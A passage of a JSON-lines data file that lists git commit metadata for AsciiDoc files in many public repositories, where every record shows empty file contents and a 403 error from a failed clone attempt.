2016-01-04-Java-8.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-04-Java-8.adoc","new_file":"_posts\/2016-01-04-Java-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa46ab0a48d99bafc5f7ed859969d9551ae1a512","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/a_little_prayer.adoc","new_file":"content\/writings\/a_little_prayer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"26648b70aabf421d1cdbe55a4442ade69bbbab56","subject":"add readme","message":"add readme\n","repos":"gengjiawen\/AndroidHelper,gengjiawen\/AndroidHelper","old_file":"codegen_util\/Timber\/README.adoc","new_file":"codegen_util\/Timber\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gengjiawen\/AndroidHelper.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e78ba26ed6b17bac13ee00e5dd5444b54591cef","subject":"Worked on documentation.","message":"Worked on documentation.\n","repos":"libyal\/winreg-kb,libyal\/winreg-kb,Acidburn0zzz\/winreg-kb","old_file":"documentation\/Registry files.asciidoc","new_file":"documentation\/Registry files.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Acidburn0zzz\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e4fb07da91dedf059b07e703c9327273e88615ad","subject":"Create README.adoc","message":"Create README.adoc","repos":"ksobkowiak-talks\/capgemini-apps-evolve-summit-2017","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ksobkowiak-talks\/capgemini-apps-evolve-summit-2017.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a577d9cb03681e97886fdcc16a1a0f44a63da106","subject":"added readme","message":"added readme\n","repos":"hivemq\/hivemq-spi","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hivemq\/hivemq-spi.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cb83db2889754003e58a85c324444b83ff7c3540","subject":"Update 2015-09-28-A-Byte-of-Python.adoc","message":"Update 2015-09-28-A-Byte-of-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14e9cd2756ca2f01c90611851cce7020b82b3ea0","subject":"Update 2016-02-08-Introduction.adoc","message":"Update 2016-02-08-Introduction.adoc","repos":"Oziabr\/Oziabr.github.io,Oziabr\/Oziabr.github.io","old_file":"_posts\/2016-02-08-Introduction.adoc","new_file":"_posts\/2016-02-08-Introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Oziabr\/Oziabr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1aec1d6da64f575e5a12381eeb5f8a269989863d","subject":"Update 2016-06-24-Kitchen-Sink.adoc","message":"Update 2016-06-24-Kitchen-Sink.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d41c171e8be5612ce6b30564ca1f0139bd0c629e","subject":"Readme.adoc","message":"Readme.adoc\n","repos":"spring-cloud-stream-app-starters\/http","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud-stream-app-starters\/http.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fbcdc319c03c5d1c4c5543801d29c011e724b526","subject":"Add basic readme","message":"Add basic readme\n","repos":"jpkrohling\/hawkular-btm,objectiser\/hawkular-apm,jpkrohling\/hawkular-apm,hawkular\/hawkular-btm,jpkrohling\/hawkular-apm,jpkrohling\/hawkular-btm,jpkrohling\/hawkular-apm,objectiser\/hawkular-apm,hawkular\/hawkular-apm,jpkrohling\/hawkular-apm,hawkular\/hawkular-btm,objectiser\/hawkular-btm,objectiser\/hawkular-btm,hawkular\/hawkular-btm,jpkrohling\/hawkular-apm,objectiser\/hawkular-apm,hawkular\/hawkular-btm,jpkrohling\/hawkular-btm,objectiser\/hawkular-apm,hawkular\/hawkular-apm,hawkular\/hawkular-apm,jpkrohling\/hawkular-btm,objectiser\/hawkular-btm,hawkular\/hawkular-apm,objectiser\/hawkular-btm,hawkular\/hawkular-apm,jpkrohling\/hawkular-btm,objectiser\/hawkular-apm,objectiser\/hawkular-btm,hawkular\/hawkular-btm","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jpkrohling\/hawkular-apm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"78fd170740c7d09cb9d6f33c952da64e72a05e83","subject":"Update 2017-03-10-Hello.adoc","message":"Update 2017-03-10-Hello.adoc","repos":"aql\/hubpress.io,aql\/hubpress.io,aql\/hubpress.io,aql\/hubpress.io","old_file":"_posts\/2017-03-10-Hello.adoc","new_file":"_posts\/2017-03-10-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aql\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa87438da67bfee6f7cbea60a8ed9df445019ead","subject":"Create 2018-04-03-test1.adoc","message":"Create 2018-04-03-test1.adoc","repos":"rballan\/rballan.github.io,rballan\/rballan.github.io,rballan\/rballan.github.io,rballan\/rballan.github.io","old_file":"_posts\/2018-04-03-test1.adoc","new_file":"_posts\/2018-04-03-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rballan\/rballan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47e3bdefa8988055d7f970c543bb5b5ebe623f94","subject":"add new doc","message":"add new doc\n","repos":"jbosschina\/openshift-cookbooks","old_file":"linux\/dns.adoc","new_file":"linux\/dns.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbosschina\/openshift-cookbooks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c45eea17c4a0e7c973fd74403969eeeb0a23a330","subject":"y2b create post Batman Arkham City Collector's Edition Unboxing","message":"y2b create post Batman Arkham City Collector's Edition Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-18-Batman-Arkham-City-Collectors-Edition-Unboxing.adoc","new_file":"_posts\/2011-10-18-Batman-Arkham-City-Collectors-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e699fd6ef03b1b1d08c9905795dc3bf821b316cb","subject":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","message":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d7359df2bc5107708ebe48d46fc8fcec419c9dcb","subject":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","message":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"caa7a52fb584934f2cfaffed6c02029576a5726a","subject":"Update 2017-04-05-R.adoc","message":"Update 2017-04-05-R.adoc","repos":"ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io","old_file":"_posts\/2017-04-05-R.adoc","new_file":"_posts\/2017-04-05-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ioisup\/ioisup.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9e667e3e952bc116f7f118a9cf053e912a81e2b","subject":"y2b create post Ever Tried Rolling Your Keyboard?","message":"y2b create post Ever Tried Rolling Your Keyboard?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-15-Ever-Tried-Rolling-Your-Keyboard.adoc","new_file":"_posts\/2017-08-15-Ever-Tried-Rolling-Your-Keyboard.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e99f49d8e85208fb4d792a7ddc2f8dbe667b77f","subject":"BendableLongScore contributed by DieterDePaepe","message":"BendableLongScore contributed by DieterDePaepe\n","repos":"bibryam\/optaplanner-website,psiroky\/optaplanner-website,oskopek\/optaplanner-website,psiroky\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,bibryam\/optaplanner-website,oskopek\/optaplanner-website,bibryam\/optaplanner-website,droolsjbpm\/optaplanner-website,psiroky\/optaplanner-website","old_file":"download\/releaseNotes\/releaseNotes6.2.adoc","new_file":"download\/releaseNotes\/releaseNotes6.2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e35a81edf2591772255aad75c5765b9798196fef","subject":"Adding README file to plugin","message":"Adding README file to plugin\n","repos":"aerogear\/aerogear-testing-tools","old_file":"aerogear-test-env-plugin\/README.adoc","new_file":"aerogear-test-env-plugin\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aerogear\/aerogear-testing-tools.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b524246f866d4341520b5402d0b63ffe2131e0ce","subject":"Fixed quotes","message":"Fixed quotes\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4a932b6ea618c33158605e8ec94987802d4f2342","subject":"Update 2017-07-03-The-user-friendly-computer-programs.adoc","message":"Update 2017-07-03-The-user-friendly-computer-programs.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db74f612612ed9cf8ca8c4e4a310a704cceeced8","subject":"landing page for the documentation","message":"landing page for the documentation\n","repos":"noncom\/ccw,michelangelo13\/ccw,noncom\/ccw,noncom\/ccw,laurentpetit\/ccw,michelangelo13\/ccw,ccw-ide\/ccw,michelangelo13\/ccw,ccw-ide\/ccw,ccw-ide\/ccw,laurentpetit\/ccw,laurentpetit\/ccw","old_file":"doc\/src\/index.adoc","new_file":"doc\/src\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/noncom\/ccw.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"2de44815eed93933d7bc494b7dca2b61de51bf78","subject":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","message":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eeb633676c92659c41f62053c67659e9c1c84398","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b396794e22cf93cc51f2670e50263cd13910acd","subject":"Update 2015-10-20-nodebrew_install_memo.adoc","message":"Update 2015-10-20-nodebrew_install_memo.adoc","repos":"tom-konda\/blog,tom-konda\/blog,tom-konda\/blog,tom-konda\/blog","old_file":"_posts\/2015-10-20-nodebrew_install_memo.adoc","new_file":"_posts\/2015-10-20-nodebrew_install_memo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tom-konda\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5ff9905adda290a33c876c7e128bc7937b91a6a","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e21f4e2844aa0730e207994b07f6ce43fe1cda26","subject":"Update 2018-01-28-User-friendly-Windows.adoc","message":"Update 2018-01-28-User-friendly-Windows.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2018-01-28-User-friendly-Windows.adoc","new_file":"_posts\/2018-01-28-User-friendly-Windows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"96c30b8d6387468acd3fae12d3b578ad97180ba4","subject":"fix curl snippet that should use GET not OPTIONS (#143)","message":"fix curl snippet that should use GET not OPTIONS (#143)\n\n","repos":"juxt\/yada,mbutlerw\/yada,juxt\/yada,delitescere\/yada,delitescere\/yada,mbutlerw\/yada,delitescere\/yada,mbutlerw\/yada,juxt\/yada","old_file":"doc\/hello.adoc","new_file":"doc\/hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbutlerw\/yada.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b856261123323d08448ca50f87df3caadd143074","subject":"Renamed '_posts\/2018-11-28-Some-Great-Books-on-Investment.adoc' to '_posts\/2017-11-28-Some-Great-Books-on-Investment.adoc'","message":"Renamed '_posts\/2018-11-28-Some-Great-Books-on-Investment.adoc' to '_posts\/2017-11-28-Some-Great-Books-on-Investment.adoc'","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-28-Some-Great-Books-on-Investment.adoc","new_file":"_posts\/2017-11-28-Some-Great-Books-on-Investment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09154e438cfca51f53020260b45be663fe63d15c","subject":"Update 2017-10-17-The-journey-to-becoming-a-writer-begins-err-continues.adoc","message":"Update 2017-10-17-The-journey-to-becoming-a-writer-begins-err-continues.adoc","repos":"ahopkins\/amhopkins.com,ahopkins\/amhopkins.com,ahopkins\/amhopkins.com,ahopkins\/amhopkins.com,ahopkins\/amhopkins.com","old_file":"_posts\/2017-10-17-The-journey-to-becoming-a-writer-begins-err-continues.adoc","new_file":"_posts\/2017-10-17-The-journey-to-becoming-a-writer-begins-err-continues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ahopkins\/amhopkins.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c854e5e46ff535039cc7c97d0afb3d4ff3ec5ff","subject":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","message":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6775b1edd9a029e50e7c4902b79ae7848e4dc5a","subject":"Fix formatting error","message":"Fix formatting error\n","repos":"asashour\/framework,asashour\/framework,Darsstar\/framework,Darsstar\/framework,Darsstar\/framework,Darsstar\/framework,Darsstar\/framework,mstahv\/framework,mstahv\/framework,mstahv\/framework,mstahv\/framework,asashour\/framework,mstahv\/framework,asashour\/framework,asashour\/framework","old_file":"documentation\/articles\/VaadinScalabilityTestingWithAmazonWebServices.asciidoc","new_file":"documentation\/articles\/VaadinScalabilityTestingWithAmazonWebServices.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f0468510cfe63e035dc51095bea06a829d4ee619","subject":"Update 2013-06-03-Understanding-required-and-allowEmpty-in-CakePHP-validation-rules.adoc","message":"Update 2013-06-03-Understanding-required-and-allowEmpty-in-CakePHP-validation-rules.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2013-06-03-Understanding-required-and-allowEmpty-in-CakePHP-validation-rules.adoc","new_file":"_posts\/2013-06-03-Understanding-required-and-allowEmpty-in-CakePHP-validation-rules.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e03c9f607eb02df29e433e96e315cde8d9a02473","subject":"Fixed a formatting error","message":"Fixed a formatting error\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week03.asciidoc","new_file":"asciidoc\/week03.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6f66006911a4fab72f58ff96aad854a1b5e2a6a6","subject":"Update 2016-11-05-Dear-Diary.adoc","message":"Update 2016-11-05-Dear-Diary.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91a3d4c5a13098cd7c89877171d0579d90606b34","subject":"Update 2017-07-18-Who-We-Are.adoc","message":"Update 2017-07-18-Who-We-Are.adoc","repos":"Asastry1\/inflect-blog,Asastry1\/inflect-blog,Asastry1\/inflect-blog,Asastry1\/inflect-blog","old_file":"_posts\/2017-07-18-Who-We-Are.adoc","new_file":"_posts\/2017-07-18-Who-We-Are.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Asastry1\/inflect-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"456f25bb21049ce00d9a2612531a70aa31ce7a68","subject":"Update 2017-02-03-What-Git-Lab-Left-Us.adoc","message":"Update 2017-02-03-What-Git-Lab-Left-Us.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5a7d1f4111bc611e876d2fa1d379b08277dfd20","subject":"Update 2016-11-25-Lets-programming-offline-to-gather-quality-and-knowledge.adoc","message":"Update 2016-11-25-Lets-programming-offline-to-gather-quality-and-knowledge.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-11-25-Lets-programming-offline-to-gather-quality-and-knowledge.adoc","new_file":"_posts\/2016-11-25-Lets-programming-offline-to-gather-quality-and-knowledge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c88d02107c82b0bf377286d237e939c96fb1a079","subject":"CAMEL-11156 - added Deployments component doc","message":"CAMEL-11156 - added Deployments component doc\n","repos":"adessaigne\/camel,CodeSmell\/camel,apache\/camel,jonmcewen\/camel,isavin\/camel,kevinearls\/camel,objectiser\/camel,anton-k11\/camel,jamesnetherton\/camel,tadayosi\/camel,pmoerenhout\/camel,ullgren\/camel,isavin\/camel,onders86\/camel,akhettar\/camel,christophd\/camel,onders86\/camel,tdiesler\/camel,dmvolod\/camel,jamesnetherton\/camel,tadayosi\/camel,pax95\/camel,davidkarlsen\/camel,pmoerenhout\/camel,pkletsko\/camel,tdiesler\/camel,nicolaferraro\/camel,christophd\/camel,sverkera\/camel,pmoerenhout\/camel,punkhorn\/camel-upstream,cunningt\/camel,pax95\/camel,kevinearls\/camel,christophd\/camel,DariusX\/camel,rmarting\/camel,pkletsko\/camel,jonmcewen\/camel,ullgren\/camel,punkhorn\/camel-upstream,alvinkwekel\/camel,sverkera\/camel,sverkera\/camel,gautric\/camel,anton-k11\/camel,drsquidop\/camel,mcollovati\/camel,mgyongyosi\/camel,anoordover\/camel,onders86\/camel,isavin\/camel,tdiesler\/camel,mgyongyosi\/camel,Fabryprog\/camel,cunningt\/camel,pax95\/camel,pkletsko\/camel,kevinearls\/camel,Thopap\/camel,christophd\/camel,gnodet\/camel,akhettar\/camel,CodeSmell\/camel,DariusX\/camel,drsquidop\/camel,sverkera\/camel,rmarting\/camel,apache\/camel,rmarting\/camel,CodeSmell\/camel,Thopap\/camel,anton-k11\/camel,isavin\/camel,Fabryprog\/camel,Fabryprog\/camel,curso007\/camel,mcollovati\/camel,pmoerenhout\/camel,ullgren\/camel,isavin\/camel,gnodet\/camel,Fabryprog\/camel,tadayosi\/camel,anoordover\/camel,mgyongyosi\/camel,anoordover\/camel,davidkarlsen\/camel,apache\/camel,nicolaferraro\/camel,kevinearls\/camel,drsquidop\/camel,nicolaferraro\/camel,pax95\/camel,anton-k11\/camel,Thopap\/camel,anton-k11\/camel,pkletsko\/camel,adessaigne\/camel,pkletsko\/camel,nicolaferraro\/camel,mgyongyosi\/camel,objectiser\/camel,alvinkwekel\/camel,jonmcewen\/camel,mgyongyosi\/camel,cunningt\/camel,dmvolod\/camel,objectiser\/camel,snurmine\/camel,tadayosi\/camel,curso007\/camel,gnodet\/camel,onders86\/camel,salikjan\/camel,dmvolod\/camel,mcollovati\/camel,snurmine\/camel,ullgren\/camel,snurmine\/camel,gautric\/camel,zregvart\/camel,zregvart\/camel,akhettar\/camel,davidkarlsen\/camel,drsquidop\/camel,DariusX\/camel,anoordover\/camel,mgyongyosi\/camel,isavin\/camel,anton-k11\/camel,sverkera\/camel,nikhilvibhav\/camel,tdiesler\/camel,kevinearls\/camel,punkhorn\/camel-upstream,tadayosi\/camel,jamesnetherton\/camel,onders86\/camel,curso007\/camel,tdiesler\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,christophd\/camel,sverkera\/camel,Thopap\/camel,dmvolod\/camel,zregvart\/camel,dmvolod\/camel,apache\/camel,adessaigne\/camel,jamesnetherton\/camel,akhettar\/camel,curso007\/camel,pax95\/camel,curso007\/camel,rmarting\/camel,akhettar\/camel,apache\/camel,gautric\/camel,pmoerenhout\/camel,davidkarlsen\/camel,mcollovati\/camel,rmarting\/camel,rmarting\/camel,curso007\/camel,adessaigne\/camel,pax95\/camel,pkletsko\/camel,apache\/camel,zregvart\/camel,objectiser\/camel,CodeSmell\/camel,gnodet\/camel,pmoerenhout\/camel,jamesnetherton\/camel,anoordover\/camel,gautric\/camel,jonmcewen\/camel,onders86\/camel,anoordover\/camel,nikhilvibhav\/camel,Thopap\/camel,nikhilvibhav\/camel,cunningt\/camel,snurmine\/camel,cunningt\/camel,alvinkwekel\/camel,gautric\/camel,tadayosi\/camel,drsquidop\/camel,DariusX\/camel,snurmine\/camel,snurmine\/camel,Thopap\/camel,jonmcewen\/camel,tdiesler\/camel,gautric\/camel,christophd\/camel,punkhorn\/camel-upstream,gnodet\/camel,adessaigne\/camel,cunningt\/camel,akhettar\/camel,jonmcewen\/camel,jamesnetherton\/camel,adessaigne\/camel,salikjan\/camel,dmvolod\/camel,drsquidop\/camel,kevinearls\/camel","old_file":"components\/camel-kubernetes\/src\/main\/docs\/kubernetes-deployments-component.adoc","new_file":"components\/camel-kubernetes\/src\/main\/docs\/kubernetes-deployments-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 